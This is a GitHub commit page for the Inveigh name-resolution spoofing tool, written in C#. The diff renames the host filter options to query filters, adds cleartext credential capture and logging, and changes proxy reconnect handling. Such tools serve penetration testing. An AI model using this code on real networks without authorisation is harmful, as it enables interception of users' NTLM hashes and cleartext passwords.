Skip to content

Commit

Permalink
cleartext, proxy fixes
Browse files Browse the repository at this point in the history 
Fixed cleartext capture/output bugs
Added proxyauth reconnect relay
Changed IgnoreHosts/ReplyToHosts to IgnoreQueries/ReplyToQueries
  • Loading branch information
@Kevin-Robertson
Kevin-Robertson committed Sep 28, 2022
1 parent 9931ad5 commit 5116878
Show file tree
Hide file tree
Showing 11 changed files with 129 additions and 67 deletions.
4 changes: 2 additions & 2 deletions Inveigh/Listeners/DNSListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,8 +39,8 @@ public override bool Check(string name, string type, string clientIP, out string

DNSChecker helper = new DNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IgnoreDomains = Program.argIgnoreDomains,
Expand Down
5 changes: 5 additions & 0 deletions Inveigh/Listeners/HTTPListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,11 @@ protected override void OutputNTLM(string protocol, string listenerPort, string
Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, clientIP, host, protocol, listenerPort, clientPort, lmResponseHash);
}

protected override void OutputCleartext(string protocol, string listenerPort, string clientIP, string clientPort, string credentials)
{
Output.CleartextOutput(protocol, listenerPort, clientIP, clientPort, credentials);
}

protected override void OutputChallenge(string protocol, string listenerPort, string clientIP, string clientPort, string challenge)
{
Output.Queue(String.Format("[+] [{0}] {1}({2}) NTLM challenge [{3}] sent to {4}:{5}", Output.Timestamp(), protocol, listenerPort, challenge, clientIP, clientPort));
Expand Down
12 changes: 6 additions & 6 deletions Inveigh/Listeners/LLMNRListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -28,10 +28,10 @@ protected override void OutputError(Exception ex)
public override bool Check(string name, string type, string clientIP, out string message)
{

LLMNRChecker llmnrHelper = new LLMNRChecker
LLMNRChecker llmnrChecker = new LLMNRChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
Expand All @@ -41,13 +41,13 @@ public override bool Check(string name, string type, string clientIP, out string
Inspect = Program.enabledInspect,
};

if (llmnrHelper.Check(name, type, clientIP))
if (llmnrChecker.Check(name, type, clientIP))
{
message = llmnrHelper.OutputMessage;
message = llmnrChecker.OutputMessage;
return true;
}

message = llmnrHelper.OutputMessage;
message = llmnrChecker.OutputMessage;
return false;
}

Expand Down
4 changes: 2 additions & 2 deletions Inveigh/Listeners/MDNSListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -33,8 +33,8 @@ public override bool Check(string name, string question, string type, string cli

MDNSChecker mdnsHelper = new MDNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
Expand Down
4 changes: 2 additions & 2 deletions Inveigh/Listeners/NBNSListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -31,8 +31,8 @@ public override bool Check(string name, string type, string clientIP, out string

NetBIOSNSChecker helper = new NetBIOSNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
Expand Down
28 changes: 14 additions & 14 deletions Inveigh/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -74,10 +74,10 @@ class Program
public static string[] argIgnoreAgents = { "Firefox" };
public static string[] argIgnoreDomains;
public static string[] argIgnoreIPs;
public static string[] argIgnoreHosts;
public static string[] argIgnoreQueries;
public static string[] argIgnoreMACs;
public static string[] argReplyToDomains;
public static string[] argReplyToHosts;
public static string[] argReplyToQueries;
public static string[] argReplyToIPs;
public static string[] argReplyToMACs;
public static string argSpooferIP = "";
Expand Down Expand Up @@ -174,7 +174,7 @@ class Program
public static string netbiosDomain = Environment.UserDomainName;
public static string dnsDomain = "";
public static ulong smb2Session = 5548434740922023936; // todo check
public static string version = "2.0.6";
public static string version = "2.0.8";

static void Main(string[] arguments)
{
Expand Down Expand Up @@ -355,11 +355,6 @@ static void Main(string[] arguments)
argIgnoreDomains = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-IGNOREHOSTS":
case "/IGNOREHOSTS":
argIgnoreHosts = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-IGNOREIPS":
case "/IGNOREIPS":
argIgnoreIPs = arguments[entry.index + 1].ToUpper().Split(',');
Expand All @@ -370,6 +365,11 @@ static void Main(string[] arguments)
argIgnoreMACs = arguments[entry.index + 1].ToUpper().Replace(":", "").Replace("-", "").Split(',');
break;

case "-IGNOREQUERIES":
case "/IGNOREQUERIES":
argIgnoreQueries = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-INSPECT":
case "/INSPECT":
argInspect = arguments[entry.index + 1].ToUpper();
Expand Down Expand Up @@ -545,11 +545,6 @@ static void Main(string[] arguments)
argReplyToDomains = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-REPLYTOHOSTS":
case "/REPLYTOHOSTS":
argReplyToHosts = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-REPLYTOIPS":
case "/REPLYTOIPS":
argReplyToIPs = arguments[entry.index + 1].ToUpper().Split(',');
Expand All @@ -558,7 +553,12 @@ static void Main(string[] arguments)
case "-REPLYTOMACS":
case "/REPLYTOMACS":
argReplyToMACs = arguments[entry.index + 1].ToUpper().Replace(":", "").Replace("-", "").Split(',');
break;
break;

case "-REPLYTOQUERIES":
case "/REPLYTOQUERIES":
argReplyToQueries = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-WEBDAV":
case "/WEBDAV":
Expand Down
22 changes: 20 additions & 2 deletions Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -41,6 +41,7 @@
using System.Net.Security;
using Quiddity.Support;
using System.Collections;
using System.Collections.Generic;

namespace Quiddity
{
Expand All @@ -64,6 +65,7 @@ class HTTPListener
public static bool isRunning = false;
public const SslProtocols tls12 = (SslProtocols)0x00000C00;
public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable());
public static Hashtable tcpSessionTable = Hashtable.Synchronized(new Hashtable());

public HTTPListener()
{
Expand Down Expand Up @@ -118,8 +120,18 @@ internal void Start(IPAddress ipAddress, int port, string type)
if (isRunning)
{
TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync);
object[] parameters = { tcpClient, type, port };
ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters);
string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString();

if (type.Equals("Proxy") && tcpSessionTable.ContainsKey(sourceIP) && DateTime.Compare((DateTime)tcpSessionTable[sourceIP], DateTime.Now) > 0)
{
tcpClient.Client.Close();
}
else
{
object[] parameters = { tcpClient, type, port };
ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters);
}

}

}
Expand Down Expand Up @@ -490,6 +502,12 @@ internal void ReceiveClient(object parameters)
if (type.Equals("Proxy"))
{
tcpClient.Client.Close();

if (!tcpSessionTable.ContainsKey(sourceIP) || DateTime.Compare((DateTime)tcpSessionTable[sourceIP], DateTime.Now) <= 0)
{
tcpSessionTable[sourceIP] = DateTime.Now.AddSeconds(1);
}

}
else
{
Expand Down
20 changes: 10 additions & 10 deletions Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -37,8 +37,8 @@ namespace Quiddity.DNS
{
class DNSChecker
{
public string[] IgnoreHosts { get; set; }
public string[] ReplyToHosts { get; set; }
public string[] IgnoreQueries { get; set; }
public string[] ReplyToQueries { get; set; }
public string[] IgnoreIPs { get; set; }
public string[] ReplyToIPs { get; set; }
public string[] IgnoreDomains { get; set; }
Expand Down Expand Up @@ -103,12 +103,12 @@ public bool Check(string name, string type, string clientIP)
this.OutputMessage = this.OutputServiceDenied;
return false;
}
else if (HostIsDenied(name) || FQDNIsDenied(name))
else if (QueryIsDenied(name) || FQDNIsDenied(name))
{
this.OutputMessage = this.OutputHostDenied;
return false;
}
else if (!HostIsAllowed(name) && !FQDNIsAllowed(name))
else if (!QueryIsAllowed(name) && !FQDNIsAllowed(name))
{
this.OutputMessage = this.OutputHostDenied;
return false;
Expand Down Expand Up @@ -193,23 +193,23 @@ public bool ServiceIsAllowed(string name, string type)
return true;
}

public bool HostIsDenied(string name)
public bool QueryIsDenied(string name)
{
string host = (name.Split('.'))[0];

if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == host.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreQueries) && Array.Exists(this.IgnoreQueries, element => element == host.ToUpper()))
{
return true;
}

return false;
}

public bool HostIsAllowed(string name)
public bool QueryIsAllowed(string name)
{
string host = (name.Split('.'))[0];

if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == host.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToQueries) && !Array.Exists(this.ReplyToQueries, element => element == host.ToUpper()))
{
return false;
}
Expand All @@ -220,7 +220,7 @@ public bool HostIsAllowed(string name)
public bool FQDNIsDenied(string name)
{

if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == name.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreQueries) && Array.Exists(this.IgnoreQueries, element => element == name.ToUpper()))
{
return true;
}
Expand All @@ -231,7 +231,7 @@ public bool FQDNIsDenied(string name)
public bool FQDNIsAllowed(string name)
{

if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == name.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToQueries) && !Array.Exists(this.ReplyToQueries, element => element == name.ToUpper()))
{
return false;
}
Expand Down
65 changes: 51 additions & 14 deletions Inveigh/Support/Output.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -592,12 +592,12 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

lock (Program.IPCaptureList)
{
Program.IPCaptureList.Add(string.Concat(host));
Program.IPCaptureList.Add(sourceIP);
}

lock (Program.HostCaptureList)
{
Program.HostCaptureList.Add(string.Concat(host));
Program.HostCaptureList.Add(host);
}

}
Expand Down Expand Up @@ -642,12 +642,12 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

lock (Program.IPCaptureList)
{
Program.IPCaptureList.Add(string.Concat(host));
Program.IPCaptureList.Add(sourceIP);
}

lock (Program.HostCaptureList)
{
Program.HostCaptureList.Add(string.Concat(host));
Program.HostCaptureList.Add(host);
}

}
Expand Down Expand Up @@ -680,6 +680,43 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

}

public static void CleartextOutput(string protocol, string listenerPort, string clientIP, string clientPort, string credentials)
{

bool isUnique = false;

if (Program.cleartextList.Any(str => str.Contains(credentials)))
{
isUnique = true;
}

lock (Program.cleartextList)
{
Program.cleartextList.Add(string.Concat(clientIP, ",", credentials));
}

if (Program.enabledConsoleUnique && isUnique)
{
Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials captured from {3}({4}):\r\n[not unique]", Timestamp(), protocol, listenerPort, clientIP, clientPort));
}
else
{
Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials captured from {3}({4}):\r\n{5}", Timestamp(), protocol, listenerPort, clientIP, clientPort, credentials));
}

if (Program.enabledFileOutput && (!Program.enabledFileUnique || !isUnique))
{

lock (Program.cleartextFileList)
{
Program.cleartextFileList.Add(string.Concat(clientIP, ",", credentials));
}

Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials written to {3}", Timestamp(), protocol, listenerPort, String.Concat(Program.argFilePrefix, "-Cleartext.txt")));
}

}

public static void FileOutput()
{

Expand Down Expand Up @@ -1005,10 +1042,10 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "IGNOREHOSTS"))
if (nullarg || string.Equals(arg, "IGNOREQUERIES"))
{
string argument = "IgnoreHosts";
string description = "Default=None: Comma separated list of hostnames to ignore when spoofing.";
string argument = "IgnoreQueries";
string description = "Default=None: Comma separated list of name queries to ignore when spoofing.";
OutputHelp(argument, description);
}

Expand Down Expand Up @@ -1117,13 +1154,6 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOHOSTS"))
{
string argument = "ReplyToHosts";
string description = "Default=All: Comma separated list of hostnames to respond to when spoofing.";
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOIPS"))
{
string argument = "ReplyToIPs";
Expand All @@ -1138,6 +1168,13 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOQUERIES"))
{
string argument = "ReplyToqueries";
string description = "Default=All: Comma separated list of name queries to respond to when spoofing.";
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "SPOOFERIP"))
{
string argument = "SpooferIP";
Expand Down
Loading

0 comments on commit 5116878

Please sign in to comment.